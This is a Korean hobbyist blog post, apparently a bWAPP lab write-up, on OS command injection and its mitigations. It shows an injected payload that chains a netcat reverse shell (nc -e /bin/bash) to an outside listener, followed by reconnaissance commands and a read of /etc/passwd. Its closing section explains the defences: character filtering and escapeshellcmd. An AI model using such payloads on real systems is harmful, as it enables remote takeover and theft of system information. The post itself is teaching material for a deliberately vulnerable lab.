취미로 개발하는 화이트해커

최대 1 분 소요


Injection

공격자가 신뢰할 수 없는 입력을 프로그램에 주입하도록 하는 공격.



Command Injection

OS명령어를 입력하여 내부정보 유출 및 악의적인 행위를 수행

포트를 열고 포트서버에 연결하여 원격조정을 해보자


리눅스

image-20220318005419095

  • 포트 열고


Bbox

image-20220316020449205

www.nsa.gov && nc -vn 172.30.1.31 8888 -e /bin/bash

  • 다음과 같이 입력
  • -e /bin/bash 옵션은 shell을 이용해 상호작용하기 위함
  • -e 는 exec의 약자로 뒤에 넣은 것 실행


리눅스

image-20220316020541411

  • 연결 확인

결과

image-20220316020639739

  • whoami, hostname, id 를 통해 서버에서 개인정보 확인 가능

image-20220316020721761

  • 또한, Bbox에서도 command 명령어와 cat 명령어 통해 /etc/passwd 디렉토리 정보 확인 가능

image-20220316020903254


Command 명령어

; 앞 명령어 실패와 상관없이 다음 명령어 실행

  앞 명령어 실패시 다음 명령어 실행(디렉토리 이동 시 사용)
앞 명령의 결과를 뒤 명령어에게 넘겨줌(more, awk, grep와 같이 사용)

&& 앞 명령어가 성공 시 다음 명령어 실행

& 앞 명령어를 백그라운드로 실행하고 다음 명령어 실행



대응방안

Linux

image-20220317225533437

  • vi 편집기를 통해 commandi.php 소스코드를 열어주면
  • 레벨 1 = Medium 일 때 commandi_check_1 함수를 쓰고
  • 레벨 2 = High 일 때 commindi_check_2 함수를 쓰는 것을 확인할 수 있다.


functions_external.php

image-20220317225732419

  • commandi_check_1 에서는 “&”, “;” 문자들을 공백으로 대체해주고
  • commnadi_check_2 에서는 escapeshellcmd 함수를 사용하여 보안을 적용하고 있다.
  • escapeshellcmd :
    • 인자로 받은 명령어가 실행되었을 때, 의도치 않았던 쉘 명령어가 실행되는 것을 방지하는 함수.
    • 메타캐릭터에 역슬래쉬를 붙여 명령어를 실행하지 못하게 한다.

업데이트:

참고